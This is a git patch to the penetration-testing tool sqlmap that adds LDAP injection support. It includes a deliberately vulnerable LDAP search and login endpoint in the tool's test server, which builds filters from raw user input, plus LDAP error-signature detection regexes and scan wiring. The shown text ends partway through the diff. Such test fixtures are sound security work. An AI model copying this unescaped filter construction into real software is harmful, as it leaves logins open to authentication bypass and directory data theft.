From e8162d314ae47fdf55952425522597e1cd1a3d3f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Miroslav=20=C5=A0tampar?= Date: Sun, 28 Jun 2026 01:36:38 +0200 Subject: [PATCH] Adding switch --ldap --- data/txt/sha256sums.txt | 15 +- extra/vulnserver/vulnserver.py | 295 +++++++++++++ lib/controller/checks.py | 8 + lib/controller/controller.py | 17 +- lib/core/settings.py | 42 +- lib/core/testing.py | 1 + lib/parse/cmdline.py | 3 + lib/techniques/ldap/__init__.py | 8 + lib/techniques/ldap/inject.py | 750 ++++++++++++++++++++++++++++++++ tests/test_ldap.py | 420 ++++++++++++++++++ 10 files changed, 1545 insertions(+), 14 deletions(-) create mode 100644 lib/techniques/ldap/__init__.py create mode 100644 lib/techniques/ldap/inject.py create mode 100644 tests/test_ldap.py diff --git a/data/txt/sha256sums.txt b/data/txt/sha256sums.txt index a0a32e0db..899d7e710 100644 --- a/data/txt/sha256sums.txt +++ b/data/txt/sha256sums.txt @@ -160,10 +160,10 @@ ca86d61d3349ed2d94a6b164d4648cff9701199b5e32378c3f40fca0f517b128 extra/shutils/ df768bcb9838dc6c46dab9b4a877056cb4742bd6cfaaf438c4a3712c5cc0d264 extra/shutils/recloak.sh 1972990a67caf2d0231eacf60e211acf545d9d0beeb3c145a49ba33d5d491b3f extra/shutils/strip.sh 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 extra/vulnserver/__init__.py -faaaa586baa4df245b8780a1a808ebf07e3027ce4245ded3274d908c49e1eecd extra/vulnserver/vulnserver.py +32577fc21a6170266438b608ed81620e0b0a889aa8a05124bc7f0905cba772a6 extra/vulnserver/vulnserver.py a2bf70d7f87c3a4e0675c0bad54119a4e04efa6ea2730a8338d5aebcd995630e lib/controller/action.py -284b5b056f048e5951c43605965f6758cb9cefa54ca30d818b2c1d1c6713fb91 lib/controller/checks.py -b1e89bff221cc907f5033bae941bf7929de9490f5dcdf2747cba676acd2da95b lib/controller/controller.py +c9a1661fc6719655e1e5b6dd72caab680766690c5f746b386093267329f7b3b8 lib/controller/checks.py +256ba0c6967121dc25c95fe09d1165dd8d0530f26c7879e6036f649fb0a6de95 lib/controller/controller.py d69e84f1648cdb907f5d2dd454f03874a4613752b07867510145d51d84b3c56f lib/controller/handler.py 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/controller/__init__.py 9c5764c92ce536d1f0f96200359ee5ef1f37f9128769bf990cb77f1d1f8e17b1 lib/core/agent.py @@ -189,18 +189,18 @@ ccc4a717e887652b1fcce073d9409d9c59a3b28548c703a9e453d15845f90cd7 lib/core/patch 9bf174058f15d14e24e94f9aaf42df045119d3617c6c54bd2f3af79b462f331d lib/core/replication.py 0b8c38a01bb01f843d94a6c5f2075ee47520d0c4aa799cecea9c3e2c5a4a23a6 lib/core/revision.py 888daba83fd4a34e9503fe21f01fef4cc730e5cde871b1d40e15d4cbc847d56c lib/core/session.py -1e5c125c69d2921ed69041a2462f6b41d11f9c1afdfe1987b60657484aa5ccf0 lib/core/settings.py +af4dcbb3256ae407ade6fa8270d01d4bbf398d50be3be16b80572835662d6c2f lib/core/settings.py c7804223319e18eb0b8e2cbf0a8b6896d1cefb7b0b1a2e9f1cf826a8a3b56750 lib/core/shell.py a2e98a94b231432736d6b304fc75525c8b5fdb4768c418387c5b4c1a610dad64 lib/core/subprocessng.py 19f1e3c5e3ba703d28d510cd7a9ab8284d5fbe9df5ce7e77c86e5931571364b7 lib/core/target.py -5955be979a1d5d3ee221d12e88805f6ef767d43bd4c542e01714cc868c4d020c lib/core/testing.py +83e23dd422b0debc82f14b2d072eb36ee478a23e4299caf986372c8c40d00b2c lib/core/testing.py 95656c44bab1771f4808030dd6a17eae5b129cb1234443f00b19695c7b712b86 lib/core/threads.py b9aacb840310173202f79c2ba125b0243003ee6b44c92eca50424f2bdfc83c02 lib/core/unescaper.py 53e396902cb2546eaa09e77073fcba8be8827ee9ce055cfc899e81b0e6ad4d6d lib/core/update.py 2400e465fa4d13e4c32795910878c71ff212e4361b46428d57ce43983f5e997c lib/core/wordlist.py 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/__init__.py 54bfd31ebded3ffa5848df1c644f196eb704116517c7a3d860b5d081e984d821 lib/parse/banner.py -c515041ee2d50aded9afa371de47c3c44c81b30546fb1f6f170b2169ae5e64b4 lib/parse/cmdline.py +a6440d24f8d6b772221fc78a655d3df07a000ba23e7924bd51cf5068097ee1fb lib/parse/cmdline.py 02d82e4069bd98c52755417f8b8e306d79945672656ac24f1a45e7a6eff4b158 lib/parse/configfile.py c5b258be7485089fac9d9cd179960e774fbd85e62836dc67cce76cc028bb6aeb lib/parse/handler.py 5c9a9caee948843d5537745640cc7b98d70a0412cc0949f59d4ebe8b2907c06c lib/parse/headers.py @@ -242,6 +242,8 @@ a66a4b9df6207dce722c9b71d290ea426723cb4b697b416065dc7dd5db96fe8e lib/techniques 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/graphql/__init__.py a1c5ec208843eb93e0fab40daac090aa3bf914a7dd0afb0f7c55c2db4db8d72b lib/techniques/graphql/inject.py 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/__init__.py +1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/ldap/__init__.py +d469815c430caaafeeba285d10974456b96d7019f95738fe8038bfd0855068e4 lib/techniques/ldap/inject.py 44401cad3e39ae9fb899ed5d0e2fdd0879561de05c3117f17f3b0db54f4e3724 lib/techniques/nosql/__init__.py d62b28bf9f1544e65a1017994402f484166f4d64a1efb724351b15e27b851990 lib/techniques/nosql/inject.py 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/union/__init__.py @@ -601,6 +603,7 @@ bb6991260a994fcbe79e05febaa34affd5631d02299fbc626820addd5f6ea4f4 tests/test_err c04e8358fb6df45f69f2f26435c971acde280535bf304e84d30cf2681158c6a7 tests/test_hash.py d539d0ae758b5bb91e314ab82ab4fe03d6fb2f8b377d16aefa6d7d1d77a7d5a9 tests/test_identifiers_output.py 5372270b7ed82b62f273c2e9bd1f7ecd8605371e66cd0ad70663762cb08d42f1 tests/test_inference_engine.py +13d0369f3fea7262f7944999f559da38e5284cbc76660fd7aeffedad78e65f5f tests/test_ldap.py caa06fed7323b2bb6d0f2443ce343de94f75bf8ad012c055d5e07741d908ebad tests/test_misc.py 790b78c600b61eb0bdd6e07e14b1db3eb2ddd5fc5d4edb9e975f85ced38558c7 tests/test_nosql.py 57fa9713a3186020be8bcc3f06399e92bf9ce82ec6d3413c76babe19606bb698 tests/test_openapi_drift.py diff --git a/extra/vulnserver/vulnserver.py b/extra/vulnserver/vulnserver.py index c13a95526..99189fbab 100644 --- a/extra/vulnserver/vulnserver.py +++ b/extra/vulnserver/vulnserver.py @@ -117,6 +117,61 @@ SCHEMA = """ INSERT INTO creds (user_id, password_hash) VALUES (28, '908f7e6d5c4b3a291807f6e5d4c3b2a1'); INSERT INTO creds (user_id, password_hash) VALUES (29, '3049b791fa83e2f42f37bae18634b92d'); INSERT INTO creds (user_id, password_hash) VALUES (30, 'd59a348f90d757c7da30418773424b5e'); + + CREATE TABLE directory ( + dn TEXT, + uid TEXT, + cn TEXT, + sn TEXT, + givenName TEXT, + displayName TEXT, + userPassword TEXT, + mail TEXT, + objectClass TEXT, + objectCategory TEXT, + ou TEXT, + title TEXT, + department TEXT, + company TEXT, + o TEXT, + telephoneNumber TEXT, + mobile TEXT, + manager TEXT, + description TEXT, + l TEXT, + st TEXT, + street TEXT, + postalCode TEXT, + c TEXT, + employeeNumber TEXT, + employeeType TEXT, + member TEXT + ); + -- Column order: dn, uid, cn, sn, givenName, displayName, userPassword, mail, + -- objectClass, objectCategory, ou, title, department, company, o, + -- telephoneNumber, mobile, manager, description, l, st, street, + -- postalCode, c, employeeNumber, employeeType, member + INSERT INTO directory VALUES ('uid=luther,ou=users,dc=example,dc=com', 'luther', 'Luther Blisset', 'Blisset', 'Luther', 'Luther Blisset', 'db3a16990a0008a3b04707fdef6584a0', 'luther@example.com', 'inetOrgPerson', 'Person', 'users', 'System Administrator', 'IT Operations', 'Example Corp', 'Example', '+1 555 0100', '+1 555 0101', 'uid=ada,ou=users,dc=example,dc=com', 'System administrator', 'London', 'Greater London', '10 Downing Street', 'SW1A 2AA', 'GB', '1001', 'Employee', NULL); + INSERT INTO directory VALUES ('uid=fluffy,ou=users,dc=example,dc=com', 'fluffy', 'Fluffy Bunny', 'Bunny', 'Fluffy', 'Fluffy Bunny', '4db967ce67b15e7fb84c266a76684729', 'fluffy@example.com', 'inetOrgPerson', 'Person', 'users', 'Security Engineer', 'Security', 'Example Corp', 'Example', '+1 555 0102', '+1 555 0103', NULL, 'Security engineer', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL); + INSERT INTO directory VALUES ('uid=wu,ou=users,dc=example,dc=com', 'wu', 'Wu Ming', 'Ming', 'Wu', 'Wu Ming', 'f5a2950eaa10f9e99896800eacbe8275', 'wu@example.com', 'inetOrgPerson', 'Person', 'users', NULL, NULL, NULL, NULL, NULL, NULL, NULL, 'Developer', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL); + INSERT INTO directory VALUES ('uid=mark,ou=users,dc=example,dc=com', 'mark', 'Mark Lewis', 'Lewis', 'Mark', 'Mark Lewis', '179ad45c6ce2cb97cf1029e212046e81', 'mark@example.com', 'inetOrgPerson', 'Person', 'users', NULL, NULL, NULL, NULL, NULL, NULL, NULL, 'Project manager', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL); + INSERT INTO directory VALUES ('uid=ada,ou=users,dc=example,dc=com', 'ada', 'Ada Lovelace', 'Lovelace', 'Ada', 'Ada Lovelace', '0f1e2d3c4b5a69788796a5b4c3d2e1f0', 'ada@example.com', 'inetOrgPerson', 'Person', 'users', 'Mathematician', 'Research', 'Example Corp', 'Example', '+1 555 0104', NULL, NULL, 'Mathematician', 'Cambridge', NULL, NULL, NULL, NULL, NULL, NULL, NULL); + INSERT INTO directory VALUES ('uid=grace,ou=users,dc=example,dc=com', 'grace', 'Grace Hopper', 'Hopper', 'Grace', 'Grace Hopper', 'a1b2c3d4e5f60718293a4b5c6d7e8f90', 'grace@example.com', 'inetOrgPerson', 'Person', 'users', NULL, NULL, NULL, NULL, NULL, NULL, NULL, 'Computer scientist', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL); + INSERT INTO directory VALUES ('uid=alan,ou=users,dc=example,dc=com', 'alan', 'Alan Turing', 'Turing', 'Alan', 'Alan Turing', '1a2b3c4d5e6f708192a3b4c5d6e7f809', 'alan@example.com', 'inetOrgPerson', 'Person', 'users', NULL, NULL, NULL, NULL, NULL, NULL, NULL, 'Cryptanalyst', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL); + INSERT INTO directory VALUES ('uid=margaret,ou=users,dc=example,dc=com', 'margaret', 'Margaret Hamilton', 'Hamilton', 'Margaret', 'Margaret Hamilton', '9f8e7d6c5b4a3928170605f4e3d2c1b0', 'margaret@example.com', 'inetOrgPerson', 'Person', 'users', NULL, NULL, NULL, NULL, NULL, NULL, NULL, 'Software engineer', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL); + INSERT INTO directory VALUES ('uid=donald,ou=users,dc=example,dc=com', 'donald', 'Donald Knuth', 'Knuth', 'Donald', 'Donald Knuth', '3c2d1e0f9a8b7c6d5e4f30291807f6e5', 'donald@example.com', 'inetOrgPerson', 'Person', 'users', NULL, NULL, NULL, NULL, NULL, NULL, NULL, 'Computer scientist', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL); + INSERT INTO directory VALUES ('uid=tim,ou=users,dc=example,dc=com', 'tim', 'Tim Berners-Lee', 'Berners-Lee', 'Tim', 'Tim Berners-Lee', 'b0c1d2e3f405162738495a6b7c8d9eaf', 'tim@example.com', 'inetOrgPerson', 'Person', 'users', 'Inventor', 'Research', 'Example Corp', 'Example', '+1 555 0105', NULL, NULL, 'Inventor of the Web', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL); + INSERT INTO directory VALUES ('uid=linus,ou=users,dc=example,dc=com', 'linus', 'Linus Torvalds', 'Torvalds', 'Linus', 'Linus Torvalds', '6e5d4c3b2a190807f6e5d4c3b2a1908f', 'linus@example.com', 'inetOrgPerson', 'Person', 'users', NULL, NULL, NULL, NULL, NULL, NULL, NULL, 'Kernel developer', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL); + INSERT INTO directory VALUES ('uid=ken,ou=users,dc=example,dc=com', 'ken', 'Ken Thompson', 'Thompson', 'Ken', 'Ken Thompson', '11223344556677889900aabbccddeeff', 'ken@example.com', 'inetOrgPerson', 'Person', 'users', NULL, NULL, NULL, NULL, NULL, NULL, NULL, 'Unix co-creator', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL); + INSERT INTO directory VALUES ('uid=dennis,ou=users,dc=example,dc=com', 'dennis', 'Dennis Ritchie', 'Ritchie', 'Dennis', 'Dennis Ritchie', 'ffeeddccbbaa00998877665544332211', 'dennis@example.com', 'inetOrgPerson', 'Person', 'users', NULL, NULL, NULL, NULL, NULL, NULL, NULL, 'C language creator', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL); + INSERT INTO directory VALUES ('uid=barbara,ou=users,dc=example,dc=com', 'barbara', 'Barbara Liskov', 'Liskov', 'Barbara', 'Barbara Liskov', '1234567890abcdef1234567890abcdef', 'barbara@example.com', 'inetOrgPerson', 'Person', 'users', NULL, NULL, NULL, NULL, NULL, NULL, NULL, 'Turing Award winner', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL); + INSERT INTO directory VALUES ('uid=edsger,ou=users,dc=example,dc=com', 'edsger', 'Edsger Dijkstra', 'Dijkstra', 'Edsger', 'Edsger Dijkstra', 'abcdef1234567890abcdef1234567890', 'edsger@example.com', 'inetOrgPerson', 'Person', 'users', NULL, NULL, NULL, NULL, NULL, NULL, NULL, 'Computer scientist', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL); + INSERT INTO directory VALUES ('ou=users,dc=example,dc=com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, 'organizationalUnit', NULL, 'users', NULL, NULL, NULL, NULL, NULL, NULL, NULL, 'User accounts', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL); + INSERT INTO directory VALUES ('ou=groups,dc=example,dc=com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, 'organizationalUnit', NULL, 'groups', NULL, NULL, NULL, NULL, NULL, NULL, NULL, 'Group entries', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL); + INSERT INTO directory VALUES ('cn=admins,ou=groups,dc=example,dc=com', NULL, 'admins', NULL, NULL, NULL, NULL, NULL, 'groupOfNames', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 'Administrators group', NULL, NULL, NULL, NULL, NULL, NULL, NULL, 'uid=luther,ou=users,dc=example,dc=com'); + INSERT INTO directory VALUES ('cn=admins,ou=groups,dc=example,dc=com', NULL, 'admins', NULL, NULL, NULL, NULL, NULL, 'groupOfNames', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 'Administrators group', NULL, NULL, NULL, NULL, NULL, NULL, NULL, 'uid=ada,ou=users,dc=example,dc=com'); + INSERT INTO directory VALUES ('cn=developers,ou=groups,dc=example,dc=com', NULL, 'developers', NULL, NULL, NULL, NULL, NULL, 'groupOfNames', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 'Developers group', NULL, NULL, NULL, NULL, NULL, NULL, NULL, 'uid=wu,ou=users,dc=example,dc=com'); + INSERT INTO directory VALUES ('cn=developers,ou=groups,dc=example,dc=com', NULL, 'developers', NULL, NULL, NULL, NULL, NULL, 'groupOfNames', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 'Developers group', NULL, NULL, NULL, NULL, NULL, NULL, NULL, 'uid=linus,ou=users,dc=example,dc=com'); """ LISTEN_ADDRESS = "localhost" @@ -246,6 +301,201 @@ def waf_score(value, ua=None, level=0): retVal += WAF_SCANNER_UA_WEIGHT return retVal +# --- LDAP endpoint (vulnerable search and login, backed by the directory table) ------------------ + +def _ldap_escape_like(value): + """Escape a value for safe embedding in a SQLite LIKE pattern: backslash, percent, + and underscore are the only characters with special meaning in LIKE.""" + if value is None: + return None + return value.replace('\\', '\\\\').replace('%', '\\%').replace('_', '\\_') + +def _ldap_attr(attr): + """Map an LDAP attribute name to the directory table column, or None if unknown.""" + valid = {"dn", "uid", "cn", "sn", "givenName", "displayName", "userPassword", "mail", "objectClass", "objectCategory", "ou", "title", "department", "company", "o", "telephoneNumber", "mobile", "manager", "description", "l", "st", "street", "postalCode", "c", "employeeNumber", "employeeType", "member"} + return attr if attr in valid else None + +def _ldap_match(text, start): + """Find the closing ')' that balances the opening '(' at `start`. Skip escaped + hex sequences (e.g. \\28 for literal '(' inside a value) but treat every raw ')' + as a structural closer.""" + depth = 0 + i = start + while i < len(text): + ch = text[i] + if ch == '(': + depth += 1 + elif ch == ')': + depth -= 1 + if depth == 0: + return i + 1 + elif ch == '\\': + i += 1 + i += 1 + return len(text) + +def _ldap_parse_value(text, start): + """Parse an assertion value from filter text at position `start`, handling escape sequences. + Returns (value, end_pos).""" + retVal = [] + i = start + while i < len(text) and text[i] not in (')',): + if text[i] == '\\' and i + 2 < len(text): + retVal.append(chr(int(text[i+1:i+3], 16))) + i += 3 + else: + retVal.append(text[i]) + i += 1 + return ''.join(retVal), i + +def _ldap_filter_to_sql(text, start=0): + """Convert an LDAP filter substring starting at `start` to a parameterized + SQLite WHERE clause. Returns (sql_template, params, end_pos) or (None, [], end_pos) + on parse failure. Values are passed as parameters so that user-controlled + characters (apostrophe, backslash, etc.) cannot break the SQL string literal.""" + + if start >= len(text) or text[start] != '(': + return None, [], start + + i = start + 1 + if i >= len(text): + return None, [], start + + op = text[i] + i += 1 + + if op in ('&', '|'): + # Compound filter: collect all sub-filters + sub_clauses = [] + sub_params = [] + while i < len(text) and text[i] == '(': + clause, params, i = _ldap_filter_to_sql(text, i) + if clause: + sub_clauses.append(clause) + sub_params.extend(params) + # Always use bracket-matched end so nested compounds don't shift the + # parent's notion of where this child ends (reviewer blocker 3) + end = _ldap_match(text, start) + if not sub_clauses: + return None, [], end + if len(sub_clauses) == 1: + return sub_clauses[0], sub_params, end + joiner = " AND " if op == '&' else " OR " + return "(%s)" % joiner.join(sub_clauses), sub_params, end + + elif op == '!': + # NOT filter + clause, params, i = _ldap_filter_to_sql(text, i) + end = _ldap_match(text, start) + if clause: + return "(NOT (%s))" % clause, params, end + return None, [], end + + else: + # Simple filter: attr OP value + # Re-read from start+1 to get the full attr name + j = start + 1 + while j < len(text) and text[j] not in ('=', '>', '<', '~', ')'): + j += 1 + attr = text[start+1:j].strip() + if not attr: + return None, [], _ldap_match(text, start) + + col = _ldap_attr(attr) + if col is None: + return None, [], _ldap_match(text, start) + + if j >= len(text): + return None, [], start + + # Check for approx match (~=) + if text[j] == '~' and j + 1 < len(text) and text[j+1] == '=': + op_type = '~=' + j += 2 + elif text[j] == '>' and j + 1 < len(text) and text[j+1] == '=': + op_type = '>=' + j += 2 + elif text[j] == '<' and j + 1 < len(text) and text[j+1] == '=': + op_type = '<=' + j += 2 + elif text[j] == '=': + op_type = '=' + j += 1 + else: + return None, [], _ldap_match(text, start) + + value, _ = _ldap_parse_value(text, j) + end = _ldap_match(text, start) + + if op_type == '=': + if value == '*': + return "(%s IS NOT NULL AND %s != '')" % (col, col), [], end + elif '*' in value: + parts = value.split('*') + if len(parts) == 2 and not parts[0] and not parts[1]: + # Just '*' -> presence + return "(%s IS NOT NULL AND %s != '')" % (col, col), [], end + elif len(parts) == 2 and parts[0] and not parts[1]: + # 'prefix*' -> anchored prefix match (LDAP semantics) + return "(%s LIKE ? ESCAPE '\\')" % col, ["%s%%" % _ldap_escape_like(parts[0])], end + elif len(parts) == 2 and not parts[0] and parts[1]: + # '*suffix' -> anchored suffix match (LDAP semantics) + return "(%s LIKE ? ESCAPE '\\')" % col, ["%%%s" % _ldap_escape_like(parts[1])], end + else: + # '*mid*', 'pre*mid*suf', etc. -- split('*') already + # partitions the value into literal segments; joining + # them with '%' naturally produces the correct anchored + # LIKE pattern: empty first/last elements from surrounding + # wildcards become leading/trailing '%' automatically. + pattern = '%'.join(_ldap_escape_like(p) for p in parts) + return "(%s LIKE ? ESCAPE '\\')" % col, [pattern], end + else: + return "(%s = ?)" % col, [value], end + elif op_type == '>=': + return "(%s >= ?)" % col, [value], end + elif op_type == '<=': + return "(%s <= ?)" % col, [value], end + elif op_type == '~=': + return "(%s = ?)" % col, [value], end + + return None, [], end + + +def _ldap_execute(filter_str): + """Execute an LDAP filter against the directory table. Returns (rows, error_msg).""" + if not filter_str or not filter_str.strip(): + return None, "Bad search filter" + + # Simple bracket validation + if filter_str.count('(') != filter_str.count(')'): + return None, "Bad search filter (-7)" + + try: + clause, params, _ = _ldap_filter_to_sql(filter_str) + if not clause: + return None, "Bad search filter (-7)" + + sql = "SELECT * FROM directory WHERE %s" % clause + with _lock: + _cursor.execute(sql, params) + rows = _cursor.fetchall() + return rows, None + except Exception as ex: + msg = str(ex) + # Emulate different back-end error messages + if "no such column" in msg.lower(): + return None, "Bad search filter" + if "unrecognized" in msg.lower() or "syntax" in msg.lower(): + return None, "Bad search filter (-7)" + return None, "Bad search filter (%s)" % msg.split(':')[0] + +def _ldap_row_to_obj(row): + """Convert a SQLite row to a dict with non-None attributes.""" + if not row: + return None + keys = ("dn", "uid", "cn", "sn", "givenName", "displayName", "userPassword", "mail", "objectClass", "objectCategory", "ou", "title", "department", "company", "o", "telephoneNumber", "mobile", "manager", "description", "l", "st", "street", "postalCode", "c", "employeeNumber", "employeeType", "member") + return dict((k, row[i]) for i, k in enumerate(keys) if row[i] is not None) + # --- GraphQL endpoint (vulnerable Apollo-style, backed by the same SQLite database) ---------- # Hard-coded introspection response matching the schema below. Every GraphQL tool (including @@ -594,6 +844,51 @@ class ReqHandler(BaseHTTPRequestHandler): self.wfile.write(output.encode(UNICODE_ENCODING)) return + if self.url in ("/ldap", "/ldap/search"): + self.send_response(OK) + self.send_header("Content-type", "application/json; charset=%s" % UNICODE_ENCODING) + self.send_header("Connection", "close") + self.end_headers() + + q = self.params.get("q", "") + if q: + filter_str = "(|(cn=*%s*)(sn=*%s*)(mail=*%s*)(uid=*%s*)(description=*%s*))" % (q, q, q, q, q) + rows, error = _ldap_execute(filter_str) + if error: + output = json.dumps({"resultCode": 1, "errorMessage": error}) + else: + entries = [_ldap_row_to_obj(r) for r in (rows or [])] + output = json.dumps({"resultCode": 0, "entries": entries, "count": len(entries)}, default=str) + else: + output = json.dumps({"resultCode": 0, "entries": [], "count": 0}) + + self.wfile.write(output.encode(UNICODE_ENCODING)) + return + + if self.url == "/ldap/login": + self.send_response(OK) + self.send_header("Content-type", "application/json; charset=%s" % UNICODE_ENCODING) + self.send_header("Connection", "close") + self.end_headers() + + user = self.params.get("user", "") + password = self.params.get("pass", "") + if user and password: + filter_str = "(&(uid=%s)(userPassword=%s))" % (user, password) + rows, error = _ldap_execute(filter_str) + if error: + output = json.dumps({"resultCode": 49, "errorMessage": error}) + elif rows: + entry = _ldap_row_to_obj(rows[0]) + output = json.dumps({"resultCode": 0, "authenticated": True, "user": entry}, default=str) + else: + output = json.dumps({"resultCode": 49, "authenticated": False, "errorMessage": "Invalid credentials"}) + else: + output = json.dumps({"resultCode": 49, "authenticated": False, "errorMessage": "Missing credentials"}) + + self.wfile.write(output.encode(UNICODE_ENCODING)) + return + if self.url == '/': if not any(_ in self.params for _ in ("id", "query")): self.send_response(OK) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 6a9fa8d34..f51d42000 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -82,6 +82,7 @@ from lib.core.settings import FORMAT_EXCEPTION_STRINGS from lib.core.settings import GRAPHQL_ERROR_REGEX from lib.core.settings import HEURISTIC_CHECK_ALPHABET from lib.core.settings import INFERENCE_EQUALS_CHAR +from lib.core.settings import LDAP_ERROR_REGEX from lib.core.settings import IPS_WAF_CHECK_PAYLOAD from lib.core.settings import IPS_WAF_CHECK_RATIO from lib.core.settings import IPS_WAF_CHECK_TIMEOUT @@ -1186,6 +1187,13 @@ def heuristicCheckSqlInjection(place, parameter): if conf.beep: beep() + if not conf.ldap and re.search(LDAP_ERROR_REGEX, page or ""): + infoMsg = "heuristic (LDAP) test shows that %sparameter '%s' might be vulnerable to LDAP injection (rerun with switch '--ldap')" % ("%s " % paramType if paramType != parameter else "", parameter) + logger.info(infoMsg) + + if conf.beep: + beep() + kb.disableHtmlDecoding = False kb.heuristicMode = False diff --git a/lib/controller/controller.py b/lib/controller/controller.py index 7b5b0dff3..2294a66c1 100644 --- a/lib/controller/controller.py +++ b/lib/controller/controller.py @@ -514,12 +514,7 @@ def start(): setupTargetEnv() - if conf.graphql: - from lib.techniques.graphql.inject import graphqlScan - graphqlScan() - continue - - if not checkConnection(suppressOutput=conf.forms): + if not any((conf.graphql,)) and not checkConnection(suppressOutput=conf.forms): continue if conf.rParam and kb.originalPage: @@ -533,11 +528,21 @@ def start(): checkWaf() + if conf.graphql: + from lib.techniques.graphql.inject import graphqlScan + graphqlScan() + continue + if conf.nosql: from lib.techniques.nosql.inject import nosqlScan nosqlScan() continue + if conf.ldap: + from lib.techniques.ldap.inject import ldapScan + ldapScan() + continue + if conf.nullConnection: checkNullConnection() diff --git a/lib/core/settings.py b/lib/core/settings.py index 22f29e553..d50f1eded 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -20,7 +20,7 @@ from lib.core.enums import OS from thirdparty import six # sqlmap version (...) -VERSION = "1.10.6.163" +VERSION = "1.10.6.164" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -843,7 +843,7 @@ HEURISTIC_CHECK_ALPHABET = ('"', '\'', ')', '(', ',', '.') BANNER = re.sub(r"\[.\]", lambda _: "[\033[01;41m%s\033[01;49m]" % random.sample(HEURISTIC_CHECK_ALPHABET, 1)[0], BANNER) # String used for dummy non-SQLi (e.g. XSS) heuristic checks of a tested parameter value -DUMMY_NON_SQLI_CHECK_APPENDIX = "<'\">" +DUMMY_NON_SQLI_CHECK_APPENDIX = "<'\">)" # Regular expression used for recognition of file inclusion errors FI_ERROR_REGEX = r"(?i)[^\n]{0,100}(no such file|failed (to )?open)[^\n]{0,100}" @@ -939,6 +939,44 @@ GRAPHQL_RUNTIME_ERRORS = ( ) GRAPHQL_ERROR_REGEX = "(?:%s)" % '|'.join(GRAPHQL_PARSE_ERRORS + GRAPHQL_VALIDATION_ERRORS + GRAPHQL_APQ_ERRORS + GRAPHQL_RUNTIME_ERRORS) +# LDAP error signatures per back-end for error-based detection and fingerprinting (matched against +# HTTP response bodies). Each tuple is (backend_name, regex_fragment). +LDAP_ERROR_SIGNATURES = ( + ("Microsoft Active Directory", r"AcceptSecurityContext error, data [0-9a-fA-F]+"), + ("Microsoft Active Directory", r"LdapErr: DSID-[0-9a-fA-F]+"), + ("Microsoft Active Directory", r"80090308:\s*LdapErr"), + ("OpenLDAP", r"(?:Bad search filter|ldap_search_ext:\s*Bad search filter)(?:\s*\(-7\))?"), + ("OpenLDAP", r"Invalid DN syntax(?:\s*\(34\))?"), + ("ApacheDS", r"javax\.naming\.(?:directory\.)?(?:Naming|Authentication|InvalidName|InvalidSearchFilter|OperationNotSupported)Exception"), + ("ApacheDS", r"org\.apache\.directory\.api\.ldap\.model\.exception\.Ldap(?:InvalidSearchFilter|InvalidDn|SchemaViolation)?Exception"), + ("ApacheDS", r"LDAPException=\d+\s+msg=ERR_\d+"), + ("Oracle Directory Server", r"(?:attribute syntax error:|ACL parsing error:|Oracle (?:Unified )?Directory)"), + ("389 Directory Server", r"(?:Filter Syntax Verification|389[- ]Directory(?:[ /]Server)?)"), + ("Java JNDI", r"javax\.naming\.(?:InvalidNameException|InvalidSearchFilterException)"), + ("python-ldap", r"ldap\.(?:INVALID_DN_SYNTAX|FILTER_ERROR|NO_SUCH_OBJECT)"), +) + +# Combined LDAP error regex used for heuristic detection (checks.py) and for recognising +# that an error response originates from an LDAP back-end rather than a generic HTTP 500 +LDAP_ERROR_REGEX = r"(?i)(?:%s)" % '|'.join(regex for _, regex in LDAP_ERROR_SIGNATURES) + +# Printable-ASCII codepoint bounds bisected during LDAP blind extraction via >= lexicographic comparison +LDAP_CHAR_MIN = 0x20 +LDAP_CHAR_MAX = 0x7e + +# Upper bound for the value-length search during LDAP blind extraction +LDAP_MAX_LENGTH = 256 + +# Attributes that definitively identify the backend vendor when probed on the RootDSE or +# a well-known directory entry. Each tuple is (attribute, expected_value_substring, backend). +LDAP_FINGERPRINT_ATTRIBUTES = ( + ("objectGUID", None, "Microsoft Active Directory"), + ("vendorName", "OpenLDAP", "OpenLDAP"), + ("vendorName", "Apache Software Foundation", "ApacheDS"), + ("vendorName", "Oracle Corporation", "Oracle Directory Server"), + ("vendorName", "Red Hat", "389 Directory Server"), +) + # Length of prefix and suffix used in non-SQLI heuristic checks NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH = 6 diff --git a/lib/core/testing.py b/lib/core/testing.py index d30c63edb..0362cc600 100644 --- 